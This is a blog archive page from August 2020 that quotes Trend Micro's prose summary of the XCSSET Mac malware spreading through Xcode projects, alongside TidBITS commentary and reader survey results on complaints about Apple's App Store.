Archive for August 14, 2020

Friday, August 14, 2020

XCSSET Mac Malware

Trend Micro (via Dave Verwer):

We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer’s Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.

This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.

This blog will summarize the findings of this threat, while its accompanying technical brief contains the full details of this attack.


Update (2020-08-17): See also: Hacker News.

Update (2020-08-24): Hartley Charlton:

In an exclusive interview with MacRumors, the security researchers behind the discovery, Oleksandr Shatkivskyi and Vlad Felenuik, have provided more information about their research.

Outlining Complaints About the App Store

Josh Centers:

At this critical juncture for the company, we wanted to take the opportunity to analyze the complaints against Apple regarding how it runs the App Store. We’ve spent a long time observing and considering these issues, and you may agree or disagree with our evaluation and conclusions. As we are neither regulators nor Apple executives, the decisions are ultimately not up to us. We merely want to lay out the issues and offer suggestions on how Apple can improve, for the sake of users, developers, and even the long-term viability of the company itself.


The most likely path forward is for Apple to do nothing different until forced to change by a regulatory body. I say this is the most likely, because, from Apple’s statements, the company seems to think it has nothing to apologize for and feels that it is doing the world a favor in the way it’s running the App Store.

However, I think this would be a mistake that both the company and its fans would eventually regret.

There’s been a lot of App Store news over the last few months, and this article ties it all together.


Update (2020-08-18): See also: Background Mode.

Update (2020-08-24): Josh Centers:

It turns out that, although TidBITS readers are largely critical of how Apple runs the App Store, they’re also against government regulation as a solution. Let’s dig into the survey questions and your responses.